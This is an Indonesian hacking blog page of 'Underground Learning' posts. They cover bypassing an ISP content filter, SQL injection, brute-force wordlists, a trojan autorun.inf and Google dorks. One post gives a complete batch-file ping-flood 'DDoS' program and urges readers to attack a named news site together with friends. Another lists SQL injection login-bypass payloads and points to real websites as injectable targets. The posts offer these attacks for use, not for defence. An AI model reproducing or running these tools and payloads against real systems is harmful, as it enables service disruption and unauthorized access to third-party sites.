b374k
v10
today : | at : | safemode : ON
> | HOME | DEAD LINK REPORT | FACEBOOK | DISCUSS | TWITTER | GOOGLE+ | YOUTUBE
HOT CATEGORIES > | BLOGGER TUTS | DOWNLOAD | NEWS and INFO | TUTORIAL | TORRENT
name author perms com modified label
Showing posts with label Underground Learning. Show all posts
Showing posts with label Underground Learning. Show all posts

Cara Cara Membuka Situs Web yang Diblokir NAWALA Indrazz Afterlife rwxr-xr-x 20 4:32 PM

Filename Cara Cara Membuka Situs Web yang Diblokir NAWALA
Permission rw-r--r--
Author Indrazz Afterlife
Date and Time 4:32 PM
Label
Action

http-afterlifecode-blogspot-com-snap_2014.02.15_14h36m25s_001_

Selamat siang, kali ini saya akan menulis bagaimana cara membuka situs web yang diblokir oleh nawala.

Sekilas tentang nawala adalah sebuah project ISP Indonesia untuk memblokir situs-situs yang berbau porno, proxy, spam dll. Tentunya project ini harus kita dukung karena menambah keamanan berinternet di Indonesia luamayan terjaga karena adanya filter ini.

Namun terkadang filter ini tidak akurat 100%, masih ada beberapa web yang kita anggap aman namun terblokir dan tidak bisa diakses, contohnya ketika saya hendak membuka situs www.ninjacloak.com diatas Open-mouthed smile

 

Bagaimana cara melewati pemblokiran ini? ada beberapa cara dibawah, anda bisa mencobanya. Terserah sesuka hati mau pilih yang mana Smile

 

1. Menggunakan Google Translate

Google translate merupakan cara paling mudah untuk membypass filter ini, caranya masuk ke www.translate.google.com lalu ketikkan URL nya kemudian klik translate:

SS1

2. Gunakan plugin anonymox untuk pengguna mozilla firefox

Buka mozilla firefox anda, kemudian masuk ke >> https://addons.mozilla.org/en-US/firefox/addon/anonymox/

kemudian klik pada DOWNLOAD NOW dan ikuti langkah dibawah. (klik gambar untuk memperbesar)

SS2

SS3
SS4

Setelah Restart Mozilla dan apabila sukses

SS6

Jika Addon bar tidak muncul, coba lihat cara dibawah

SS7

 

3. Menggunakan TOR Browser

TOR Browser adalah browser berbasis proxy yang berbasis source code mozilla firefox. Dengan TOR Browser ini kita bisa membypass situs yang diblokir dan browsing secara anonymous.

Download TOR Browser Bundle

4. Menggunakan Google Cache

Google Cache juga bisa kita manfaatkan untuk membuka situs yang diblokir oleh nawala project ini. Caranya:

SS8

 

Keempat cara diatas biasanya saya gunakan untuk membypass nawala ketika berada di warnet. Sebenarnya masih banyak cara yang lain, tentunya cara-cara buat yang sudah sangat berpengalaman di dunia networking akan lebih rumit dibandingkan cara diatas Winking smile

 

Sekian. Semoga bermanfaat bagi yang membaca.

Paham SQL Injection dan Syntax nya Indrazz Afterlife rwxr-xr-x 1 1:12 PM

Filename Paham SQL Injection dan Syntax nya
Permission rw-r--r--
Author Indrazz Afterlife
Date and Time 1:12 PM
Label
Action
Mumpung mood lagi bagus buat nulis blog, saya lanjut share saja.
SQL Injection sudah pernah saya bahas disini, nah sekarang saya perluas pada artikel ini seiring berkembangnya pengetahuan saya mengenai teknik hacking yang satu ini.

SQL Injection atau dalam bahasa indonesia Injeksi SQL, memang merupakan teknik hacking yang sampai saat ini masih banyak digunakan para attacker (penyerang suatu website).
mengapa? karena pada sebuah website yang memiliki database, pastilah disana terdapat perintah-perintah SQL.

Injeksi SQL Banyak dilakukan terhadap URL yang berjenis seperti ini...

  1. www.arche-noah.at/etomite/index.php?id=249
  2. www.florentijnhofman.nl/dev/project.php?id=154
  3. www.gamershood.com/game.php?id=1309

dan masih banyak lagi contoh lainnya. lalu bagaimana kita mendeteksi bahwa web tersebut dapat kita serang menggunakan metode injeksi sql ?
lihat struktur websitenya!
PERTAMA: Lihat pada bagian URL
jika URL mengandung parameter = atau id= maka dapat dipastikan web tersebut memiliki database yang menggunakan pemrograman SQL. (*periksa pada semua url yang ada pada website)
 contoh:


KEDUA: Lihat pada bagian halaman
jika ada halaman website yang memiliki form untuk menginput data, maka web tersebut bisa dipastikan menggunakan pemrograman database SQL. (*cek pada setiap halaman/page yang ada pada website)



pada ketiga gambar diatas kita tau bahwa pada web-web itu terdapat media (jalan) bagi para attacker untuk memasukkan syntax syntax berbahaya yang bisa saja langsung mendapatkan akses ke dalam server (database).

Pada teknik penetration testing (teknik pembobolan/penembusan) suatu website, seorang elite hacker tidak selalu menginputkan tanda ' atau -- pada url / form untuk menguji terdapat error atau tidak.
terkadang pesan error tidak akan ditampilkan, maka dari itu seorang elite hacker (bukan saya) akan mencari celah dengan cara mengira-ngira syntax apa yang akan dimasukan untuk kasus yang demikian. semoga ente mengerti bahasa ane.

bergerak pada contoh:
pada kasus yang umum sekali, injeksi SQL pada url bisa ente pelajari disini tempat saya menimba ilmu.
disana dijelaskan lengkap step by step sql injection pada url.

Beberapa Syntax yang sering digunakan untuk serangan SQL Injection:
SELECT * FROM Users WHERE Username='$username' AND Password='$password'
 SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password')))
SELECT title, text from news where id=$id
DROP tablename;--

DROP tablename;#
SELECT @@version
SELECT host, user, password FROM mysql.user; — priv

 **masih banyak syntax lainnya.

Beberapa Syntax yang sering digunakan untuk melewati halaman login (login bypass)


admin'--
= 'or' 1=1
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
admin'--
administrator'--
superuser'--
test'--
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x

**masih banyak lagi syntax yang bersangkutan. selebihnya googling ya omm... ilmu tersebar luas disana :D

 nah, dibawah ini adalah referensi saya dalam mempelajari sql injection. meskipun pada kenyataannya saya sering mengalami kegagalan dalam penetration testing, wkwkwkw ^_^
namun tak apalah, belajar adalah proses tanpa akhir. Jangan menyerah :D

Referensi 1
Referensi 2
Referensi 3
Referensi 4

HN-Community dan Indonesian Fighter Cyber adalah tempat saya belajar dan menimba ilmu. Jangan lupa bergabung disana. Kalian akan dipandu oleh pro moderator, i love indonesia . Jayalah INDONESIAKU!

WordList Untuk Bruteforce Apa Saja Indrazz Afterlife rwxr-xr-x 3 8:44 PM

Filename WordList Untuk Bruteforce Apa Saja
Permission rw-r--r--
Author Indrazz Afterlife
Date and Time 8:44 PM
Label
Action
Dalam dunia hacking (underground) kita mengenal istilah Bruteforce atau dalam bahasa indonesia paksa secara kasar. Jadi maksudnya adalah memaksa untuk masuk ke sebuah sistem (perangkat) dengan cara mencoba satu persatu kata-kata (word) yang mungkin menjadi password / username. Bingung? sama, saya juga bingung. :D

Jadi jika kita menemukan sebuah halaman log in, apa yang akan kita lakukan untuk masuk sedangkan kita tidak mengetahui username / passwordnya? nah dengan teknik bruteforce kita akan mencoba semua kata (teks) yang mungkin menjadi password / username halaman login tersebut. Masih bingung? baca dari awal :D

ini adalah kumpulan kata-kata yang mungkin dijadikan password oleh seorang admin. semoga berguna. salam underground.

DOWNLOAD WORDLIST - 800Kb ~anonfiles

Hacking Wi-Fi Bandwith Menggunakan CMD Indrazz Afterlife rwxr-xr-x 0 10:23 AM

Filename Hacking Wi-Fi Bandwith Menggunakan CMD
Permission rw-r--r--
Author Indrazz Afterlife
Date and Time 10:23 AM
Label
Action
Terkadang kita merasa jengkel dengan koneksi internet wifi pada kampus, perpustakaan, atau tempat lainnya. Padatnya pengguna menentukan kecepatan internet pada tiap komputer. Berikut adalah tips memperbanyak aliran bandwith pada sistem komputer kita menggunakan windows CMD (Command Prompt). Silahkan di cek :)




Membuat Program DDoS Sederhana Indrazz Afterlife rwxr-xr-x 0 9:48 AM

Filename Membuat Program DDoS Sederhana
Permission rw-r--r--
Author Indrazz Afterlife
Date and Time 9:48 AM
Label
Action
Pada artikel sebelumnya saya sudah membahas tentang apa itu serangan ddos. Anda bisa membacanya disini. Sekarang saya akan membahas cara membuat program sederhana untuk melancarkan serangan ini pada target yang anda inginkan.







Silahkan copy kode berwarna merah dibawah ini.


@echo off
mode 67,16
title Simple DDoS Attack
color 4F
cls
echo.
echo SIMPLE DDoS Attack
echo Indrazz AkA 1ndrazz
echo.
set /p x=Masukan URL target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=Masukan IP Target:
echo.
set /p n=Masukan jumlah paket:
echo.
:DDOS
color 0c
echo Menyerang server %m%
ping %m% -i %n% -t >nul
goto DDOS


***tulisan yang bercetak miring bisa anda ganti sesuai selera.
Paste ke notepad kemudian simpan sebagai All Files dengan nama DDoSer.bat
Klik Save
Jika program kita jalankan maka tampilannya akan menjadi seperti ini
Anda bisa memamerkannya pada rekan-rekan anda agar mereka membantu melancarkan serangan ini.
Namun program ini masih dapat diedit kodenya, agar tidak bisa diedit silahkan convert menjadi file executable (exe) menggunakan program dibawah ini. (silahkan di download terlebih dahulu)


1. Buka Program bat to exe converter
2. Pada bagian Batch file, klik tombol dibagian kanan (lihat gambar)
3. Pada bagian ini anda juga bisa menambahkan password.
    Silahkan centang Encrypt the program
    kemudian masukan password untuk membuka program sesuai yang anda
    inginkan.
4. Pindah pada tab Version Informations kemudian klik tombol seperti dibawah
    untuk mengganti icon
5. Pada bagian ini anda juga dapat mengganti informasinya. Silahkan centang
    Include versioninformation
    kemudian isikan data yang dibutuhkan.
6. Silahkan klik Compile untuk memulai konversi.
7. Hasilnya

Cara menggunakan:
1. Buka program, lalu masukan alamat web target. Misalkan www.merdeka.com
2. kemudian tekan enter
3. Anda akan diminta memasukan IP Target. Masukan data seperti gambar dibawah
4. Kemudian tekan enter. dan anda akan diminta memasukan jumlah paket.
    masukan saja 1000 atau terserah anda ;)
5. Kemudian tekan enter dan program akan menjalankan serangan.

***Untuk menambah kekuatan serangan, lakukan langkah 1 sampai 5 beberapa kali. Sesuai performa komputer anda. Lakukan juga secara serempak bersama teman-teman anda.

Apa itu SQL Injection Indrazz Afterlife rwxr-xr-x 0 5:22 PM

Filename Apa itu SQL Injection
Permission rw-r--r--
Author Indrazz Afterlife
Date and Time 5:22 PM
Label
Action

Dalam dunia underground (hacking), sering didengar istilah SQLi atau SQL Injection. SQLi adalah suatu teknik memasukan kode-kode (query) pada target yang memang memiliki celah untuk diinjeksi. Sehingga sang hacker bisa mendapatkan data-data penting dari web target, contohnya username admin dan passwordnya.

Untuk menjalankan aksi ini, seorang attacker (penyerang) haruslah paham jalur injeksi yang harus dilewati dan memiliki kemampuan dalam SQL query.
Contoh beberapa perintah atau query SQL.

=> SELECT column_name(s)
=> FROM table_name atau SELECT * FROM table_name
Perintah SELECT digunakan untuk memilih data pada table dari suatu database

=> WHERE column_name
Perintah WHERE digunakan untuk memfilter dari perintah SELECT

Dan masih banyak lagi query pada SQL.

Mempercepat Koneksi Modem Dengan Cheat Engine Indrazz Afterlife rwxr-xr-x 4 12:48 AM

Filename Mempercepat Koneksi Modem Dengan Cheat Engine
Permission rw-r--r--
Author Indrazz Afterlife
Date and Time 12:48 AM
Label
Action

Kecepatan koneksi mempengaruhi kegiatan kita di internet. Contohnya saya sendiri seorang blogger pemula, nonton berita di youtube, vivanews, dan kegiatan lain seperti download dan upload. Jika menggunakan modem, terkadang kita mengalami "koneksi keong".

Cukup ceramahnya, langsung saja kita ke tutorial mempercepat koneksi modem menggunakan cheat engine.

~Pastikan modem tertancap dan connected.

1. Buka Cheat Engine. Jika belum punya silahkan => DOWNLOAD CHEAT ENGINE
    Run As Administrator untuk Windows 7
2. Klik pada Select a process to open
3. Pilih pada proses modem anda kemudian klik Open. Pada kasus ini saya memilih App.exe karena saya
    menggunakan VENUS VT-28
4. Centang pada Enable Speedhack
5. Ganti 1.0 pada kolom Speed menjadi 500 kemudian klik Apply
6. Cek kecepatan koneksi internet anda disini. Atau anda bisa browsing atau mengakses youtube.
7. Dan hasil saya ketika menggunakan cara ini untuk nonton video di youtube, tanpa buffer sedikitpun.
8. Hasil saya ketika download menggunakan Internet Download Manager

Semoga bermanfaat untuk anda semua.

Trojan Source Code [Basic] Indrazz Afterlife rwxr-xr-x 0 6:39 PM

Filename Trojan Source Code [Basic]
Permission rw-r--r--
Author Indrazz Afterlife
Date and Time 6:39 PM
Label
Action

Trojan merupakan program yang berbahaya. Bisa melakukan aksi apa saja yang diinginkan pembuatnya, misal merusak / mencuri dan mengintai para korbannya. Disini saya akan memberikan sekedar sebagai ilmu pengetahuan source code trojan dalam bentuk autorun.inf

Copy paste kode aneh di dalam text box dibawah ini. Ini adalah kode trojan yang masih belum aktif.


untuk mengaktifkannya, silahkan hilangkan teks (REMOVE THIS) dan save dengan nama autorun.inf
Kode ini terdeteksi sebagai trojan oleh antivirus MSE di windows saya.
Semoga bermanfaat sebagai pembelajaran

Apa itu dork Indrazz Afterlife rwxr-xr-x 0 4:23 PM

Filename Apa itu dork
Permission rw-r--r--
Author Indrazz Afterlife
Date and Time 4:23 PM
Label
Action

Dork atau Google Dork atau Bug n  Dork

Kita sebut saja Dork, banyak sekali definisi dari kata ini. Saya akan coba jelaskan secara detail.
Dork merupakan metode pencarian pada mesin pencari google. Maksudnya gimana sih?
Google merupakan mesin pencari, apa yang ingin kita cari tinggal ketik saja terus tekan enter, maka akan keluar hasilnya.Namun pencarian menggunakan Dork tidak demikian, perhatikan contoh sederhana kita akan mencari sebuah Mp3 dari penyanyi Bon Jovi menggunakan Dork.

1. Mencari dengan metode biasa

2. Mencari dengan menggunakan dork

 Kita klik saja pada hasil nomor 1 pada hasil pencarian google. dan hasilnya kita bisa masuk ke direktori web tersebut dan melihat isi daripada folder Bon Jovi.
Tinggal dipilih lagunya dan langsung di download dengan kecepatan penuh dari server apache seperti tertera diatas.

Pembahasan:
barusan saya menggunakan dork : intitle:index.of?mp3 Bon Jovi
untuk mencari MP3 dari Bon Jovi

Apa arti intitle:
Intitle adalah Dalam Judul. Berarti dork ini meminta agar google menampilkan setiap page yang terindex yang berTITLE Index Of Bon Jovi.
dan hasilnya kita mendapat 1 list lagu dari Bon Jovi


Selain intitle apalagi?
berikut adalah daftar dork yang dapat digunakan pada mesin pencari google

intitle:
allintitle:
(Artinya mencari judul/title pada suatu web yang terindex google)

inurl:
allinurl:
(Artinya mencari suatu string yang terdapat pada url atau link)

filetype:
(Artinya mencari suatu file secara lebih spesifik)

 intext:
allintext:
(Artinya mencari suatu nilai string dalam suatu web)

site:
(Artinya mencari pada web tertentu)

link:
(Artinya mencari web2 yang mempunyai link pada web yang di pilih)

Dork juga bisa diartikan sebagai senjata hacking. Bagaimana tidak? dengan dork kita bisa mencari website yang kemungkinan ada celah untuk diretas (dihack)
 contohnya saya menggunakan dork: theme.php?id=
dan saya dapatkan web http://www.twitney.co.uk/theme.php?id=6
link tersebut sangat rentan terhadap serangan webhacking yang disebut SQL Injection.

Semoga menambah wawasan anda.

Serangan DDOS Indrazz Afterlife rwxr-xr-x 0 8:40 PM

Filename Serangan DDOS
Permission rw-r--r--
Author Indrazz Afterlife
Date and Time 8:40 PM
Label
Action

DDoS (Distributed Denial of Service)
Disini saya akan mencoba menjelaskan apa itu Serangan DDOS atau DDOS ATTACK.

Adalah serangan yang sampai saat ini masih marak terjadi. Pada umumnya serangan ini ditujukan untuk menyerang sebuah website.

T: Apa tujuan serangan DDOS?
J: Agar suatu website (target) down atau tidak bisa diakses selama serangan berlangsung

T: Mengapa terjadi serangan DDOS?
J: Alasan tertentu bagi seseorang atau kelompok yang dengan serempak menyerang sebuah website (target)
biasanya sesama admin sebuah web jual beli online. Persaingan dan sebagainya.

T: Mengapa website (target) tidak bisa diakses selama serangan berlangsung?
J: karena si penyerang (attacker) mengirimkan sejumlah data/paket/request secara berlebihan pada target. Sehingga target kehabisan daya untuk merespon semua data/paket/request dari si attacker.

T: Apa pengaruh serangan DDOS?
J: Selain website mengalami kerugian akibat tidak bisanya user mengakses web tersebut, perangkat keras dari server (website) kemungkinan akan mengalami over. Tergantung besar kecilnya suatu serangan.

T: Web apa saja yang menjadi target serangan ini?
J: Tergantung keinginan si penyerang, biasanya terjadi pada situs-situs jejaring sosial seperti facebook. Situs informasi dan berita, bahkan dulu yahoo pernah mengalami down server selama beberapa menit karena serangan ddos dari sekelompok anonymous.

T: Bagaimana cara menghindari serangan DDOS?
J: Sejauh ini ada sebuah perusahaan jasa yang menawarkan perlindungan spam dan serangan DDOS. Perusahaan ini bernama CLOUDFLARE. Anda bisa mendaftarkan web anda secara gratis maupun berbayar. Namun tidak ada sesuatu yang benar-benar aman di dunia ini, proteksi dari CLOUDFLARE sendiri sudah banyak di retas. Jadi serangan DDOS masih bisa tembus walaupun dengan perlindungan CLOUDFLARE. Sebaiknya anda mencari jalan lain seperti redirect link, IP Filtering, dan Closing Port.

Sedikit tambahan:
Beberapa metode serangan DDOS:
1. Http Flood yaitu serangan yang merequest pada port 80 secara berlebihan.
2. UDP/TCP Flood yaitu mengirimkan paket/data secara berlebihan
3. Ping Flood yaitu serangan yang mengirimkan ping (mengecek respon/tidaknya suatu server) secara berlebihan
4. Teardrop yaitu mengirimkan paket IP dengan nilai offset yang tidak pasti
5. Smurf yaitu serangan dengan mengirimkan paket ICMP secara berlebihan

 

Jayalah Indonesiaku © 2010 AFTERLIFECODE BLOG
VB (Vio b374k) Template design by p4r46hcyb3rn3t